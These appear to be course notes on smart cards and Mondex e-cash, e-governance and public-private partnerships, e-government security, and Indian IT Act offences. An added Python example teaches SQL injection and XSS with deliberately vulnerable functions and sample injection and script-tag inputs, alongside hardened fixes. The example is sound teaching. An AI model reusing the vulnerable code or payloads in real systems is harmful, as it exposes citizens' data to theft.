In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –

[figure: construction of a smart card]

Why Smart Cards –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

[figure: schematic overview of a smart card]

[figure: smart card processing]

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks, etc.

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support for multiple currencies

ADVANTAGES

CONSUMER –

Convenience

Accessibility

On-chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthened customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information

o limits for using, disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information

Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos between applications (ITSEC 6 designation)

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
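The overflow problem described above, as an added example that is not Mondex's own code: a simplified Python model of a stored-value card whose on-chip log keeps only the last ten transactions (the rolling figure the page gives for Mondex). The `Purse` class, the card names, the amounts and the `audit` function are constructed assumptions for illustration. The point it shows is that card-to-card value transfer stays consistent (the total value in the system is conserved) while the log alone stops being enough to reconstruct the balance once records have been overwritten, which is the audit gap the critics describe.

```python
from collections import deque
from dataclasses import dataclass, field
from typing import Deque, Tuple

LOG_DEPTH = 10  # the page states Mondex keeps a rolling log of 10 transactions

# One log record: (kind, counterparty id, signed amount in cents)
Record = Tuple[str, str, int]


@dataclass
class Purse:
    """Hypothetical stored-value card modelled on the description above."""
    card_id: str
    balance: int = 0                      # cents currently held on the card
    log: Deque[Record] = field(default_factory=lambda: deque(maxlen=LOG_DEPTH))
    dropped: int = 0                      # records overwritten by the rolling log

    def _record(self, kind: str, counterparty: str, amount: int) -> None:
        if len(self.log) == self.log.maxlen:
            self.dropped += 1             # the oldest record is about to be lost
        self.log.append((kind, counterparty, amount))

    def load(self, bank: str, amount: int) -> None:
        """Online load from a bank account (loads are online per the text)."""
        self.balance += amount
        self._record("load", bank, amount)

    def pay(self, payee: "Purse", amount: int) -> None:
        """Offline card-to-card transfer: value moves, no bank is involved."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient value on card")
        self.balance -= amount
        payee.balance += amount
        self._record("pay", payee.card_id, -amount)
        payee._record("receive", self.card_id, amount)


def audit(purse: Purse, opening_balance: int) -> Tuple[int, bool]:
    """Reconstruct the balance from the on-chip log alone.

    Returns (reconstructed balance, complete). Once records have been dropped
    the reconstruction no longer matches the real balance: the bank can see
    that value moved but cannot account for every unit of it.
    """
    reconstructed = opening_balance + sum(amount for _, _, amount in purse.log)
    return reconstructed, purse.dropped == 0


def simulate(payments: int, each: int = 50) -> dict:
    """Constructed scenario: one load of 1000 cents, then `payments` purchases."""
    alice = Purse("card-A")
    shop = Purse("card-SHOP")
    alice.load("bank-1", 1000)
    for _ in range(payments):
        alice.pay(shop, each)
    reconstructed, complete = audit(alice, opening_balance=0)
    return {
        "balance": alice.balance,
        "reconstructed": reconstructed,
        "complete": complete,
        "dropped": alice.dropped,
        "total_value": alice.balance + shop.balance,  # conserved by design
    }


if __name__ == "__main__":
    print(simulate(5))    # complete log: reconstruction matches the balance
    print(simulate(12))   # three records dropped: reconstruction is off by 900
```

With five purchases the log still holds the load and every payment, so `audit` reproduces the balance exactly. With twelve purchases the load record and the first two payments have been overwritten; the log now sums to a negative number while the card still holds 400 cents, and the only signal the bank gets is that the reconstruction is incomplete.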

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with making this definition congruent with a definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

[figure: suggested architecture for e-Governance]

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private

– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management –

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?

Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract: Risks and Rewards

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, and continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: capability to prevent unauthorized access to information.

Integrity: capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.

Traceability: capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: capability to prevent a person or system that intervened in an event or action from denying or challenging their participation in the event.
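To make the requirements listed above concrete, here is an added example in Python that is not from the page or from any e-Government system: a hypothetical record service that enforces authentication with salted password hashing and a constant-time comparison, authorization by role, integrity with a server-keyed HMAC over each stored record, and traceability through a hash-chained audit trail in which every action is attributed to a user and linked to its predecessor. `CitizenRecordService`, the user names, the roles and `SERVER_KEY` are constructed assumptions.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Assumption: a secret held only by the server, used to tag stored records.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"
GENESIS = "0" * 64          # chain anchor for the first audit entry


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-SHA256 hash, stored as 'salt:digest' (both hex)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split(":")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), 100_000)
    return hmac.compare_digest(candidate.hex(), digest_hex)  # constant-time


def _chain_digest(prev: str, entry: dict) -> str:
    """Link an audit entry to its predecessor so later edits are detectable."""
    return hashlib.sha256((prev + repr(sorted(entry.items()))).encode()).hexdigest()


def _record_tag(record_id: str, value: str) -> str:
    """Integrity tag: HMAC over the record id and value under the server key."""
    return hmac.new(SERVER_KEY, f"{record_id}:{value}".encode(), "sha256").hexdigest()


@dataclass
class CitizenRecordService:
    """Hypothetical e-Government record store exercising the listed requirements."""
    users: Dict[str, str] = field(default_factory=dict)               # user -> password hash
    roles: Dict[str, Set[str]] = field(default_factory=dict)          # user -> roles
    records: Dict[str, Tuple[str, str]] = field(default_factory=dict)  # id -> (value, tag)
    audit: List[dict] = field(default_factory=list)                   # append-only trail

    def register(self, user: str, password: str, roles: Set[str]) -> None:
        self.users[user] = hash_password(password)
        self.roles[user] = set(roles)

    # Traceability: every attempt is logged with who, what, and the outcome.
    def _log(self, user: str, action: str, target: str, outcome: str) -> None:
        entry = {"seq": len(self.audit), "user": user, "action": action,
                 "target": target, "outcome": outcome}
        prev = self.audit[-1]["chain"] if self.audit else GENESIS
        entry["chain"] = _chain_digest(prev, entry)
        self.audit.append(entry)

    # Authentication: is the caller who they claim to be?
    def authenticate(self, user: str, password: str) -> bool:
        stored = self.users.get(user)
        return stored is not None and verify_password(password, stored)

    # Authorization: may the authenticated caller perform this action?
    def update_record(self, user: str, password: str, record_id: str, value: str) -> bool:
        if not self.authenticate(user, password):
            self._log(user, "update", record_id, "denied: authentication failed")
            return False
        if "clerk" not in self.roles.get(user, set()):
            self._log(user, "update", record_id, "denied: not authorized")
            return False
        # Integrity: tag the stored value so silent modification is detectable.
        self.records[record_id] = (value, _record_tag(record_id, value))
        self._log(user, "update", record_id, "ok")
        return True

    def check_integrity(self, record_id: str) -> bool:
        value, tag = self.records[record_id]
        return hmac.compare_digest(tag, _record_tag(record_id, value))

    def verify_audit_chain(self) -> bool:
        """Recompute the chain; any altered or removed entry breaks it."""
        prev = GENESIS
        for entry in self.audit:
            body = {k: v for k, v in entry.items() if k != "chain"}
            if _chain_digest(prev, body) != entry["chain"]:
                return False
            prev = entry["chain"]
        return True
```

Confidentiality is left to the transport and storage layers (TLS, encryption at rest) and is not shown. Non-repudiation is also deliberately absent: an HMAC under a key the server holds proves to the server that a record was not altered, but it cannot prove to a third party which party produced the tag, so a user could still dispute an action. That property needs a per-user digital signature with a key only the user holds, which the standard library does not provide and which this example therefore does not claim.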

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

continually improve its control environment;

effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
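The two vulnerability classes named above, as an added example that is not from the cited research or from any real portal: a constructed citizen-lookup table in SQLite with a string-built query beside its parameterized form, and a reflected page fragment beside its HTML-escaped form. The table, its rows, the function names and the inputs in `demo` are constructed for illustration; the vulnerable functions are kept only so the difference in behaviour can be seen side by side.

```python
import html
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for an e-Government citizen lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, taxpayer_no TEXT)"
    )
    conn.executemany(
        "INSERT INTO citizens (name, taxpayer_no) VALUES (?, ?)",
        [("Asha Rao", "TAX-0001"), ("Bimal Sen", "TAX-0002")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """VULNERABLE: the user-supplied name is pasted into the SQL text, so quote
    characters inside it change what the query means (SQL injection)."""
    query = f"SELECT name, taxpayer_no FROM citizens WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """HARDENED: a parameterized query. The driver binds `name` as a value, so
    whatever it contains is compared as data and never parsed as SQL."""
    return conn.execute(
        "SELECT name, taxpayer_no FROM citizens WHERE name = ?", (name,)
    ).fetchall()


def render_vulnerable(name: str) -> str:
    """VULNERABLE: reflects the input into the page unchanged, so markup in it
    is interpreted by other users' browsers (cross-site scripting)."""
    return f"<p>Results for {name}</p>"


def render_hardened(name: str) -> str:
    """HARDENED: escape on output for the HTML-body context; the browser shows
    the text literally instead of interpreting it."""
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def demo() -> dict:
    """Constructed inputs run through both forms; returns what each produced."""
    conn = make_db()
    # A quote-bearing input: harmless as data, query-altering when concatenated.
    tainted_name = "' OR '1'='1"
    markup_name = "<script>x</script>"
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, tainted_name)),  # whole table
        "hardened_rows": len(lookup_hardened(conn, tainted_name)),      # no such name
        "vulnerable_html": render_vulnerable(markup_name),
        "hardened_html": render_hardened(markup_name),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val!r}")
```

Parameterization fixes the parsing problem, not the validation problem: a name field should still be checked against what a name may contain, and the account running the query should have no more privileges than the lookup needs, so that a remaining defect elsewhere leaks less. Escaping is context-specific; `html.escape` is right for text inside an element body, while values placed in attributes, URLs or script blocks need the encoding for that context.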

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever with the Intent to cause, or knowing that he is likely to cause, Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer,

Secures Access

Downloads, Copies or extracts any data, computer database or any information

Introduces or causes to be introduced any Virus or Contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, Deletes or Alters any Information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both" [S66]

S.66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

any information that is grossly offensive or has menacing character; or


any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S.66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S.66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S.66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S.67A - Punishment for publishing or transmitting material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S.67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

